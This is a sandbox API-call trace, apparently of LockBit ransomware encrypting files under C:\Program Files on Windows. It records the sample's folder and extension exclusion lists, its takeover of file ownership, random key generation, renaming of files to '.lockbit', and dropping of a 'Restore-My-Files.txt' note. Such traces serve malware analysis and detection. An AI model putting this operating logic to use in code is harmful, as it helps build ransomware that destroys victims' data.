[0082.317] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0082.317] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0082.317] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0082.317] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0082.317] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0082.317] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0082.318] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0082.318] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0082.318] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0082.318] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0082.318] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0082.318] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0082.318] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0082.318] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0082.318] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0082.318] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0082.318] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0082.318] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0082.318] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0082.318] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0082.318] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0082.318] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0082.318] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0082.318] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0082.318] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0082.318] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0082.319] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0082.319] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0082.319] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0082.319] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0082.319] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0082.319] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0082.319] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0082.319] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0082.319] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0082.319] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0082.319] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0082.319] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0082.319] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0082.319] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0082.319] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0082.319] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0082.319] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0082.319] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0082.319] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0082.320] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0082.320] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NavigationUp_SelectionSubpicture.png") returned 1 [0082.320] lstrcmpiW (lpString1="ntldr", lpString2="NavigationUp_SelectionSubpicture.png") returned 1 [0082.320] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NavigationUp_SelectionSubpicture.png") returned 1 [0082.320] lstrcmpiW (lpString1="bootsect.bak", lpString2="NavigationUp_SelectionSubpicture.png") returned -1 [0082.320] lstrcmpiW (lpString1="autorun.inf", lpString2="NavigationUp_SelectionSubpicture.png") returned -1 [0082.320] lstrcmpiW (lpString1="thumbs.db", lpString2="NavigationUp_SelectionSubpicture.png") returned 1 [0082.320] lstrcmpiW (lpString1="iconcache.db", lpString2="NavigationUp_SelectionSubpicture.png") returned -1 [0082.320] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\") returned="" [0082.320] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_SelectionSubpicture.png") returned=".png" [0082.320] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0082.320] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0082.320] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0082.320] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0082.320] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0082.320] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0082.320] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0082.320] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0082.320] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0082.321] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0082.321] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0082.321] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0082.321] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0082.321] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0082.321] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0082.321] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0082.321] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0082.321] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0082.321] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0082.321] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0082.321] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0082.321] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0082.321] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0082.321] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0082.321] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0082.321] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0082.321] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0082.321] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0082.321] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_SelectionSubpicture.png.lockbit") returned 89 [0082.322] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\navigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.322] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0082.322] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0082.322] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0082.323] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0082.323] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0082.323] RtlFreeAnsiString (AnsiString="\\") [0082.323] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6b908 | out: TokenHandle=0x3d6b908*=0x3c4) returned 0x0 [0082.323] malloc (_Size=0x200) returned 0x77d800 [0082.323] NtQueryInformationToken (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6b900 | out: TokenInformation=0x77d800, ReturnLength=0x3d6b900) returned 0x0 [0082.323] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6b6bc, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0082.323] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6b6bc, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0082.323] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_SelectionSubpicture.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6b6bc) returned 1 [0082.324] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_SelectionSubpicture.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6b6bc) returned 1 [0082.324] CloseHandle (hObject=0x3c4) returned 1 [0082.324] free (_Block=0x77d800) [0082.324] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\navigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0082.325] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0082.325] malloc (_Size=0x40068) returned 0x3d70048 [0082.326] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=3081) returned 1 [0082.326] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.326] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.327] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0082.327] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.327] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.327] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0082.327] ReadFile (in: hFile=0x3c4, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 0x0 [0082.333] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_SelectionSubpicture.png.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_SelectionSubpicture.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0082.333] malloc (_Size=0xc8) returned 0x77d800 [0082.333] NtSetInformationFile (FileHandle=0x3c4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xc8, FileInformationClass=0xa) returned 0x0 [0082.333] free (_Block=0x77d800) [0082.333] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_SelectionSubpicture.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles") returned 1 [0082.333] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt") returned 65 [0082.334] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.334] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f465237, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa7ae1d4, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f48b4a6, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x520150, dwReserved1=0x0, cFileName="OldAge", cAlternateFileName="")) returned 1 [0082.334] lstrcmpiW (lpString1=".", lpString2="OldAge") returned -1 [0082.334] lstrcmpiW (lpString1="..", lpString2="OldAge") returned -1 [0082.334] lstrcmpiW (lpString1="OldAge", lpString2="$windows.~bt") returned 1 [0082.334] lstrcmpiW (lpString1="OldAge", lpString2="intel") returned 1 [0082.334] lstrcmpiW (lpString1="OldAge", lpString2="msocache") returned 1 [0082.334] lstrcmpiW (lpString1="OldAge", lpString2="$recycle.bin") returned 1 [0082.334] lstrcmpiW (lpString1="OldAge", lpString2="$windows.~ws") returned 1 [0082.334] lstrcmpiW (lpString1="OldAge", lpString2="tor browser") returned -1 [0082.334] lstrcmpiW (lpString1="OldAge", lpString2="boot") returned 1 [0082.334] lstrcmpiW (lpString1="OldAge", lpString2="system volume information") returned -1 [0082.334] lstrcmpiW (lpString1="OldAge", lpString2="perflogs") returned -1 [0082.334] lstrcmpiW (lpString1="OldAge", lpString2="google") returned 1 [0082.334] lstrcmpiW (lpString1="OldAge", lpString2="application data") returned 1 [0082.334] lstrcmpiW (lpString1="OldAge", lpString2="windows") returned -1 [0082.335] lstrcmpiW (lpString1="OldAge", lpString2="windows.old") returned -1 [0082.335] lstrcmpiW (lpString1="OldAge", lpString2="appdata") returned 1 [0082.335] lstrcmpiW (lpString1="OldAge", lpString2="Windows nt") returned -1 [0082.335] lstrcmpiW (lpString1="OldAge", lpString2="Msbuild") returned 1 [0082.335] lstrcmpiW (lpString1="OldAge", lpString2="Microsoft") returned 1 [0082.335] lstrcmpiW (lpString1="OldAge", lpString2="All users") returned 1 [0082.335] lstrcmpiW (lpString1="OldAge", lpString2="mozilla") returned 1 [0082.335] lstrcmpiW (lpString1="OldAge", lpString2="Microsoft.NET") returned 1 [0082.335] lstrcmpiW (lpString1="OldAge", lpString2="microsoft shared") returned 1 [0082.335] lstrcmpiW (lpString1="OldAge", lpString2="Internet Explorer") returned 1 [0082.335] lstrcmpiW (lpString1="OldAge", lpString2="common files") returned 1 [0082.335] lstrcmpiW (lpString1="OldAge", lpString2="opera") returned -1 [0082.335] lstrcmpiW (lpString1="OldAge", lpString2="Windows Journal") returned -1 [0082.335] wsprintfW (in: param_1=0x3d6b928, param_2="%s\\%s" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge") returned 51 [0082.335] wsprintfW (in: param_1=0x3d6ad00, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\*") returned 53 [0082.335] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\*", fInfoLevelId=0x0, lpFindFileData=0x3d6b120, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x3d6b120) returned 0x55fe78 [0082.345] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0082.345] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f465237, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa7ae1d4, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f48b4a6, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0082.345] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0082.345] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0082.345] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fcc1ca4, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fcc1ca4, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2ed141, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x11da, dwReserved0=0x0, dwReserved1=0x0, cFileName="1047x576black.png", cAlternateFileName="")) returned 1 [0082.345] lstrcmpiW (lpString1=".", lpString2="1047x576black.png") returned -1 [0082.346] lstrcmpiW (lpString1="..", lpString2="1047x576black.png") returned -1 [0082.346] PathFindExtensionW (pszPath="1047x576black.png") returned=".png" [0082.346] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0082.346] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0082.346] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0082.346] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0082.346] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0082.346] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0082.346] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0082.346] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0082.346] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0082.346] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0082.346] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0082.346] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0082.346] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0082.346] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0082.346] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0082.346] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0082.346] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0082.346] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0082.346] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0082.346] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0082.347] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0082.347] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0082.347] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0082.347] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0082.347] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0082.347] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0082.347] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0082.347] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0082.347] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0082.347] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0082.347] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0082.347] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0082.347] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0082.347] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0082.347] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0082.347] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0082.347] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0082.347] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0082.347] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0082.347] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0082.347] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0082.348] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0082.348] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0082.348] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0082.348] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0082.348] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0082.348] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0082.348] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="1047x576black.png") returned 1 [0082.348] lstrcmpiW (lpString1="ntldr", lpString2="1047x576black.png") returned 1 [0082.348] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="1047x576black.png") returned 1 [0082.348] lstrcmpiW (lpString1="bootsect.bak", lpString2="1047x576black.png") returned 1 [0082.348] lstrcmpiW (lpString1="autorun.inf", lpString2="1047x576black.png") returned 1 [0082.348] lstrcmpiW (lpString1="thumbs.db", lpString2="1047x576black.png") returned 1 [0082.348] lstrcmpiW (lpString1="iconcache.db", lpString2="1047x576black.png") returned 1 [0082.348] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\") returned="" [0082.348] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\1047x576black.png") returned=".png" [0082.348] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0082.348] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0082.348] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0082.348] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0082.349] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0082.349] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0082.349] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0082.349] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0082.349] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0082.349] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0082.349] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0082.349] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0082.349] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0082.349] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0082.349] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0082.349] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0082.349] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0082.349] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0082.349] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0082.349] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0082.349] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0082.349] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0082.349] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0082.349] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0082.349] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0082.349] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0082.350] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0082.350] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0082.350] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\1047x576black.png.lockbit") returned 77 [0082.350] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\1047x576black.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.350] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0082.351] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0082.351] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0082.351] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0082.351] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0082.351] RtlFreeAnsiString (AnsiString="\\") [0082.351] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3b8) returned 0x0 [0082.351] malloc (_Size=0x200) returned 0x77d800 [0082.352] NtQueryInformationToken (in: TokenHandle=0x3b8, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0082.352] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0082.352] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0082.352] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\1047x576black.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0082.352] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\1047x576black.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0082.353] CloseHandle (hObject=0x3b8) returned 1 [0082.353] free (_Block=0x77d800) [0082.353] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\1047x576black.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b8 [0082.353] CreateIoCompletionPort (FileHandle=0x3b8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0082.353] malloc (_Size=0x40068) returned 0x2031ed0 [0082.353] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x2031ee8 | out: lpFileSize=0x2031ee8*=4570) returned 1 [0082.353] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.354] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.354] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2071f04, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2071f04) returned 0x0 [0082.354] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.354] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.354] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2071f14, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2071f14) returned 0x0 [0082.354] ReadFile (in: hFile=0x3b8, lpBuffer=0x2031f04, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0) returned 0x0 [0082.357] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\1047x576black.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\1047x576black.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0082.357] malloc (_Size=0xb0) returned 0x77d800 